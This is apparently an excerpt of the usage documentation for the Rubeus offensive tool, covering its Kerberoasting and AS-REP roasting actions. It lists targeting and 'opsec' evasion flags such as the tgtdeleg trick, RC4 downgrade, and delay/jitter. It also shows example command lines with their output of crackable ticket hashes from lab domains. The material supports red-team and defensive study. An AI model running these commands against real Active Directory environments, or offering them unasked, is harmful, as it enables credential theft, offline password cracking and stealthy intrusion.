With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /stats flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
If the /simple flag is specified, roasted hashes will be output to the console, one per line.
If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.
If the the TGT /ticket:X supplied (base64 encoding of a .kirbi file or the path to a .kirbi file on disk) that TGT is used to request the service service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file containing each SPN on a new line or a comma-separated list) then no LDAP searching happens for users, so it can be done from a non-domain joined system in conjunction with /dc:Z.
If the /tgtdeleg flag is supplied, the tgtdeleg trick it used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.
If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.
If the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.
If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.
If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 flag can be combined for a % jitter.
If the /enterprise flag is used, the spn is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when kerberoasting with a TGT.
If the /autoenterprise flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied as Rubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account information.
kerberoasting opsec
Here is a table comparing the behavior of various flags from an opsec perspective:
Examples
Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:
Perform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:
C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned
[*] Total kerberoastable users : 3
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName : testspn/server
[*] PwdLastSet : 5/31/2008 12:00:02 AM
[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...
[*] SamAccountName : constraineduser
[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123
[*] PwdLastSet : 9/5/2009 7:48:50 PM
[*] Supported ETypes : RC4_HMAC
[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...
[*] SamAccountName : newuser
[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123456
[*] PwdLastSet : 9/12/2008 8:05:16 PM
[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...
List statistics about found Kerberoastable accounts without actually sending ticket requests:
"Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:
C:\Rubeus>Rubeus.exe kerberoast /rc4opsec
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.6
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Found 6 users to Kerberoast!
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...
asreproast
The asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, see this post.
Just as with the kerberoast command, if no other arguments are supplied, all user accounts not requiring with Kerberos preauth not required are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
Also, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
The output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option for the new hashcat mode 18200.